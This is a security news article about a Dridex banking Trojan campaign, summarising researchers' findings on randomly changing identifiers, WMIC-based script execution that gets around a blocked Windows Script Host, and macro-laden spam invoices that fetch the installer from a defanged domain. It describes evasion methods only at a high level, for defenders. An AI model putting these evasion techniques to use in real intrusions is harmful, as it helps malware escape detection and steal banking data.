Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cybercrime

Dridex Employs Polymorphism in Recent Campaign

A recent campaign featuring the Dridex banking Trojan has shown extensive use of randomly generated variables and URL directories, eSentire’s security researchers reveal.

A recent campaign featuring the Dridex banking Trojan has shown extensive use of randomly generated variables and URL directories, eSentire’s security researchers reveal.

Around for more than half a decade, Dridex was one of the most prevalent banking malware families out there several years ago. Albeit the activity surrounding it has decreased significantly over the past couple of years, Dridex has continued to receive updates to increase attack efficiency.

Some of the changes Dridex has seen over the years include the adoption of XML scripts, hashing algorithms, peer-to-peer encryption, and peer-to-command-and-control encryption. Featuring a dynamic configuration and web injections right from the start, the malware is attempting to steal banking information from the victim’s system.

Attacks observed in June revealed the disabling or blocking of Windows Script Host to bypass mitigation, eSentire reports. The employed technique leverages the WMI command-line (WMIC) utility’s execution policy around XLS scripts to successfully infect the target machines.

The prevalent characteristic of the campaign is a constant shift in identifiers, the security researchers reveal. This has been ongoing for at least two weeks and is likely to continue, likely making it difficult for signature-based antivirus solutions to prevent infections.

“Given the same-day deployment and implementation of the ssl-pert[.]com domain on June 26th and a tendency to utilize randomly generated variables and URL directories, it is probable the actors behind this variant of Dridex will continue to change up indicators throughout the current campaign,” eSentire notes.

A similar polymorphism was observed in the supporting library as well, malware researcher and SANS ISC contributor Brad Duncan revealed a couple of weeks ago.

In attacks observed on June 17, the malware was using 64-bit DLLs with file names loaded by legitimate Windows system executables. The file paths, file names, and associated hashes would change at every computer login, the researcher said.

Advertisement. Scroll to continue reading.

The infection process begins with spam emails containing malicious documents with embedded macros that would require some level of user interaction to be triggered. Once executed, the macros reach to the ssl-pert[.]com domain to download the Dridex installer.

Just as with all spam, compromise can be avoided if the email recipients are aware of the basic protections against such messages, including avoiding opening attachments or clicking on links that come from unknown sources.

“Given email as the initial access point, employees are the first line of defense against this threat. Expect financial departments to be targeted by unsolicited invoices carrying malicious macros within. Some antivirus engines were able to detect (but not specify) the suspicious behavior,” eSentire concludes.

Related: Extensive ‘Living Off the Land’ Hides Stealthy Malware Campaign

Related: Popular Banking Trojans Share Loaders

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join this event as we dive into threat hunting tools and frameworks, and explore value of threat intelligence data in the defender’s security stack.

Register

Learn how integrating BAS and Automated Penetration Testing empowers security teams to quickly identify and validate threats, enabling prompt response and remediation.

Register

People on the Move

After the passing of Amit Yoran, Tenable has appointed Steve Vintz and Mark Thurmond as co-CEOs.

Former Wiz executive Trish Cagliostro has joined Orchid Security as Chief Revenue Officer.

Transcend has named former UnitedHealth Group CISO Aimee Cardwell as CISO in Residence.

More People On The Move

Expert Insights

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest cybersecurity news, threats, and expert insights. Unsubscribe at any time.